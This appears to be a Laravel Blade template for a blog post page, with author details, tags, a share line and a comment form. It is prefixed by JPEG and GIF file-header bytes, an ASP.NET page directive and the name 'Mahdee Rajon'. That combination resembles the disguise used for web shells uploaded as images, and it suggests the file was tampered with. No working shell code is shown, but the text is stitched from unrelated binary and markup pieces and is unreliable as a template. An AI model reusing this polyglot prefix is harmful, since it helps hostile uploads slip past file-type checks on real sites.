ÿØÿà JFIF    ÿÛ C     $.' ",#(7),01444'9=82<.342ÿÛ C  2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %> Mahdee Rajon
 ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- @extends('layout_inner_page') @section('title') {{ $blog->seo_title }} @php $tags = ''; if ($blog->tags) { foreach (json_decode($blog->tags) as $key => $blog_tag) { $tags .= $blog_tag->value . ', '; } } @endphp @endsection @section('front-content') @include('breadcrumb')
blog
{{ __('translate.By') }} {{ $blog?->author?->name }} {{ $blog->created_at->format('d M, Y') }} {{ $blog->total_comment }} {{ __('translate.Comment') }}

{{ $blog?->title }}

{!! clean($blog->description) !!}
{{ __('translate.Tags') }}:
Share:
  • avatar
    {{ __('translate.Author') }}
    {{ $blog?->author?->name }}

    {{ $blog?->author?->about_me }}

{{ __('translate.Post a comment') }}

{{ __('translate.Your email address will not be published. Required fields are marked') }} *

@csrf
@if ($general_setting->recaptcha_status == 1)
@endif
@include('components.common_blog_sidebar')
@endsection @push('js_section') @endpush